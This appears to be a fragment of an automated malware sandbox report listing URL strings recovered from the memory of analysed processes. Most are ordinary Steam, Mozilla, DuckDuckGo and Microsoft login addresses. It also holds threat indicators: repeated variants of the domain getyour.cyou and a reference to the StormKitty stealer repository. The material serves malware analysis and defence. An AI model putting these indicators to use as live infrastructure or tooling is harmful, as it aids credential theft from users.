Source: 1639401074.exe, 0000001C.00000003.2918063924.00000000014C2000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000003.2917801991.00000000014C6000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000003.2917946098.00000000014BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
Source: 1639401074.exe, 0000001C.00000003.2917946098.00000000014BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
Source: 1639401074.exe, 0000001C.00000003.2918063924.00000000014C2000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000003.2917801991.00000000014C6000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000003.2917946098.00000000014BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=Eq36AUaEgab8&l=en
Source: 1639401074.exe, 0000001C.00000003.2918063924.00000000014C2000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000003.2917801991.00000000014C6000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000003.2917946098.00000000014BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
Source: 1639401074.exe, 0000001C.00000003.2917801991.00000000014C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: 1639401074.exe, 0000001C.00000003.2917801991.00000000014C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: 1639401074.exe, 0000001C.00000003.2917801991.00000000014C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: 1639401074.exe, 0000001C.00000003.2917801991.00000000014C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: 1639401074.exe, 0000001C.00000002.2946374900.00000000014C4000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000003.2918063924.00000000014C2000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000003.2917946098.00000000014BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/ste
Source: 1639401074.exe, 0000001C.00000003.2917801991.00000000014C6000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000003.2917946098.00000000014BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/steam_share_image.jpg
Source: 1639401074.exe, 0000001C.00000003.2918063924.00000000014C2000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000003.2917801991.00000000014C6000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000003.2917946098.00000000014BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
Source: 1639401074.exe, 0000001C.00000003.2918063924.00000000014C2000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000003.2917801991.00000000014C6000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000003.2917946098.00000000014BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=gOyfgA0bHRkL&am
Source: 1639401074.exe, 0000001C.00000002.2946374900.00000000014C4000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000003.2918063924.00000000014C2000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000003.2917801991.00000000014C6000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000003.2917946098.00000000014BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
Source: 1639401074.exe, 0000001C.00000003.2918063924.00000000014C2000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000003.2917801991.00000000014C6000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000003.2917946098.00000000014BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
Source: DbCMTMgeJo.exe, 00000000.00000003.2106302389.0000000005DAA000.00000004.00000800.00020000.00000000.sdmp, Avoiding.com, 0000001A.00000002.4526202507.0000000004731000.00000004.00000800.00020000.00000000.sdmp, Avoiding.com, 0000001A.00000002.4520728051.00000000016EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: DbCMTMgeJo.exe, 00000000.00000003.2106302389.0000000005DAA000.00000004.00000800.00020000.00000000.sdmp, Avoiding.com, 0000001A.00000002.4526202507.0000000004731000.00000004.00000800.00020000.00000000.sdmp, Avoiding.com, 0000001A.00000002.4520728051.00000000016EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: regsvr32.exe, 00000022.00000002.4548728116.00007FF8A85D4000.00000002.00000001.01000000.00000019.sdmp	String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support/rust/deps
Source: DbCMTMgeJo.exe, 00000000.00000003.2075049522.0000000005DCD000.00000004.00000800.00020000.00000000.sdmp, DbCMTMgeJo.exe, 00000000.00000003.2075267820.0000000005DCD000.00000004.00000800.00020000.00000000.sdmp, DbCMTMgeJo.exe, 00000000.00000003.2074800983.0000000005DD0000.00000004.00000800.00020000.00000000.sdmp, Avoiding.com, 0000001A.00000002.4526202507.0000000004641000.00000004.00000800.00020000.00000000.sdmp, Avoiding.com, 0000001A.00000002.4530729249.0000000006574000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000022.00000002.4525258336.0000000012643000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000022.00000003.3815074409.000000001C1A1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000022.00000002.4525258336.0000000012613000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: DbCMTMgeJo.exe, 00000000.00000003.2075049522.0000000005DCD000.00000004.00000800.00020000.00000000.sdmp, DbCMTMgeJo.exe, 00000000.00000003.2075267820.0000000005DCD000.00000004.00000800.00020000.00000000.sdmp, DbCMTMgeJo.exe, 00000000.00000003.2074800983.0000000005DD0000.00000004.00000800.00020000.00000000.sdmp, Avoiding.com, 0000001A.00000002.4526202507.0000000004641000.00000004.00000800.00020000.00000000.sdmp, Avoiding.com, 0000001A.00000002.4530729249.0000000006574000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000022.00000002.4525258336.0000000012643000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000022.00000003.3815074409.000000001C1A1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000022.00000002.4525258336.0000000012613000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: DbCMTMgeJo.exe, 00000000.00000003.2075049522.0000000005DCD000.00000004.00000800.00020000.00000000.sdmp, DbCMTMgeJo.exe, 00000000.00000003.2075267820.0000000005DCD000.00000004.00000800.00020000.00000000.sdmp, DbCMTMgeJo.exe, 00000000.00000003.2074800983.0000000005DD0000.00000004.00000800.00020000.00000000.sdmp, Avoiding.com, 0000001A.00000002.4526202507.0000000004641000.00000004.00000800.00020000.00000000.sdmp, Avoiding.com, 0000001A.00000002.4530729249.0000000006574000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000022.00000002.4525258336.0000000012643000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000022.00000003.3815074409.000000001C1A1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000022.00000002.4525258336.0000000012613000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Avoiding.com, 0000001A.00000002.4523822191.00000000044DB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getyour.cyou
Source: Avoiding.com, 0000001A.00000002.4523822191.00000000044DB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getyour.cyou#
Source: Avoiding.com, 0000001A.00000002.4523822191.0000000004440000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getyour.cyou%
Source: Avoiding.com, 0000001A.00000002.4524811305.0000000004554000.00000004.00000800.00020000.00000000.sdmp, Avoiding.com, 0000001A.00000002.4523822191.0000000004440000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getyour.cyou/
Source: Avoiding.com, 0000001A.00000002.4520728051.00000000016EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://getyour.cyou/T
Source: Avoiding.com, 0000001A.00000002.4523822191.0000000004440000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getyour.cyou/d
Source: Avoiding.com, 0000001A.00000002.4523822191.00000000044DB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getyour.cyou3
Source: Avoiding.com, 0000001A.00000002.4523822191.00000000044DB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getyour.cyou7
Source: Avoiding.com, 0000001A.00000002.4523822191.0000000004440000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getyour.cyouA
Source: Avoiding.com, 0000001A.00000002.4523822191.00000000044DB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getyour.cyouK
Source: Avoiding.com, 0000001A.00000002.4523822191.00000000044DB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getyour.cyouO
Source: Avoiding.com, 0000001A.00000002.4523822191.00000000044DB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getyour.cyouS
Source: Avoiding.com, 0000001A.00000002.4523822191.0000000004440000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getyour.cyoud
Source: regsvr32.exe, 00000022.00000002.4522281030.0000000002571000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/LimerBoy/StormKitty
Source: powershell.exe, 00000023.00000002.3067255526.0000023280228000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: 1639401074.exe, 0000001C.00000003.2917946098.00000000014BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/
Source: 1639401074.exe, 0000001C.00000003.2917801991.00000000014C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/en/
Source: Avoiding.com, 0000001A.00000002.4520728051.00000000016EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: svchost.exe, 0000000D.00000002.4519812765.000002877905F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: svchost.exe, 0000000D.00000002.4519812765.000002877905F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2771033106.0000028779963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2771007330.0000028779940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2770957796.000002877993B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ApproveSession.srf
Source: svchost.exe, 0000000D.00000003.2770690266.0000028779929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2770814158.0000028779952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2771190120.0000028779956000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80600
Source: svchost.exe, 0000000D.00000003.2770690266.0000028779929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2770814158.0000028779952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2771190120.0000028779956000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601
Source: svchost.exe, 0000000D.00000002.4519812765.000002877905F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2771033106.0000028779963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2771056727.000002877996B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80502
Source: svchost.exe, 0000000D.00000002.4519812765.000002877905F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2771033106.0000028779963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2771056727.000002877996B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80600
Source: svchost.exe, 0000000D.00000002.4519812765.000002877905F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2771033106.0000028779963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2770690266.000002877992C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2771056727.000002877996B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601
Source: svchost.exe, 0000000D.00000002.4519688240.0000028779047000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2771007330.0000028779940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2770957796.000002877993B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ListSessions.srf
Source: svchost.exe, 0000000D.00000002.4519812765.000002877905F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2771033106.0000028779963000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ManageApprover.srf
Source: svchost.exe, 0000000D.00000003.2771007330.0000028779940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2770957796.000002877993B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ManageApprover.srfe
Source: svchost.exe, 0000000D.00000002.4519812765.000002877905F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2771033106.0000028779963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2771007330.0000028779940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2770957796.000002877993B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ManageLoginKeys.srf
Source: svchost.exe, 0000000D.00000002.4519812765.000002877905F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2837533227.000002877A03C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2838159383.000002877A03F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/RST2.srf
Source: svchost.exe, 0000000D.00000002.4521622103.00000287790F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/RST2.srf$z
Source: svchost.exe, 0000000D.00000002.4521622103.00000287790F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/RST2.srfds
Source: svchost.exe, 0000000D.00000002.4519688240.0000028779047000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2771007330.0000028779940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2770957796.000002877993B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/didtou.srf
Source: svchost.exe, 0000000D.00000002.4519688240.0000028779047000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2771007330.0000028779940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2770957796.000002877993B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/getrealminfo.srf
Source: svchost.exe, 0000000D.00000002.4519688240.0000028779047000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2771007330.0000028779940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2770957796.000002877993B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/getuserrealm.srf
Source: svchost.exe, 0000000D.00000003.2771190120.0000028779956000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsec
Source: svchost.exe, 0000000D.00000002.4521622103.0000028779102000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecur
Source: svchost.exe, 0000000D.00000002.4519688240.0000028779047000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2771033106.0000028779963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2771056727.000002877996B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/DeviceAssociate.srf
Source: svchost.exe, 0000000D.00000002.4519688240.0000028779047000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2771033106.0000028779963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2771056727.000002877996B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/DeviceDisassociate.srf
Source: svchost.exe, 0000000D.00000002.4519812765.000002877905F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2771033106.0000028779963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2771007330.0000028779940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2770957796.000002877993B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/DeviceQuery.srf
Source: svchost.exe, 0000000D.00000002.4519688240.0000028779047000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2771033106.0000028779963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2771056727.000002877996B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/DeviceUpdate.srf
Source: svchost.exe, 0000000D.00000002.4519688240.0000028779047000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2771033106.0000028779963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2771056727.000002877996B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/EnumerateDevices.srf
Source: svchost.exe, 0000000D.00000002.4519812765.000002877905F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2771033106.0000028779963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2771007330.0000028779940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2770957796.000002877993B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/GetAppData.srf
Source: svchost.exe, 0000000D.00000002.4519500542.000002877902B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/GetAppData.srfrfrf6085fid=cpsrfr
Source: svchost.exe, 0000000D.00000002.4519812765.000002877905F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2771033106.0000028779963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2771056727.000002877996B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/GetUserKeyData.srf
Source: svchost.exe, 0000000D.00000002.4519812765.000002877905F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2771033106.0000028779963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2770690266.000002877992C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2771056727.000002877996B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srf
Source: svchost.exe, 0000000D.00000003.2955400875.000002877908C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srf?stsft=-DrPgCseUzAKB
Source: svchost.exe, 0000000D.00000003.2770690266.0000028779929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2770814158.0000028779952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2771033106.0000028779963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2771007330.0000028779940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2771190120.0000028779956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2770957796.000002877993B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.4519500542.000002877902B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80600
Source: svchost.exe, 0000000D.00000002.4519812765.000002877905F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2770690266.0000028779929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2770814158.0000028779952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2771033106.0000028779963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2771007330.0000028779940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2771190120.0000028779956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2770957796.000002877993B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80601
Source: svchost.exe, 0000000D.00000002.4519812765.000002877905F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2770690266.0000028779929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2771033106.0000028779963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2771007330.0000028779940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2771190120.0000028779956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2770957796.000002877993B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80603
Source: svchost.exe, 0000000D.00000002.4519812765.000002877905F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2770690266.0000028779929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2770814158.0000028779952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2771033106.0000028779963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2771190120.0000028779956000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80604
Source: svchost.exe, 0000000D.00000002.4519812765.000002877905F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2771033106.0000028779963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2771056727.000002877996B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srf
Source: svchost.exe, 0000000D.00000003.2770690266.000002877992C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srfm
Source: svchost.exe, 0000000D.00000003.2888366873.000002877996D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srfsue
Source: svchost.exe, 0000000D.00000003.2771033106.0000028779963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2771007330.0000028779940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2770957796.000002877993B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80502
Source: svchost.exe, 0000000D.00000002.4519500542.000002877902B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80502Issuer
Source: svchost.exe, 0000000D.00000003.2770690266.0000028779929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2771033106.0000028779963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.4519500542.000002877902B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80600
Source: svchost.exe, 0000000D.00000003.2771007330.0000028779940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2770957796.000002877993B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=806001
Source: svchost.exe, 0000000D.00000003.2770690266.0000028779929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2770814158.0000028779952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2771033106.0000028779963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2771007330.0000028779940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2771190120.0000028779956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2770957796.000002877993B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.4519500542.000002877902B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80601
Source: svchost.exe, 0000000D.00000002.4519812765.000002877905F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2770690266.0000028779929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2770814158.0000028779952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2771033106.0000028779963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2771007330.0000028779940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2771190120.0000028779956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2770957796.000002877993B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80603
Source: svchost.exe, 0000000D.00000003.2771190120.0000028779956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2770957796.000002877993B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80604
Source: svchost.exe, 0000000D.00000002.4519812765.000002877905F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2770690266.0000028779929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2770814158.0000028779952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2771033106.0000028779963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2771190120.0000028779956000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80605
Source: svchost.exe, 0000000D.00000002.4519812765.000002877905F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2770690266.0000028779929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2770814158.0000028779952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2771033106.0000028779963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2771190120.0000028779956000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80606
Source: svchost.exe, 0000000D.00000002.4519812765.000002877905F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2770690266.0000028779929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2770814158.0000028779952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2771033106.0000028779963000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80607
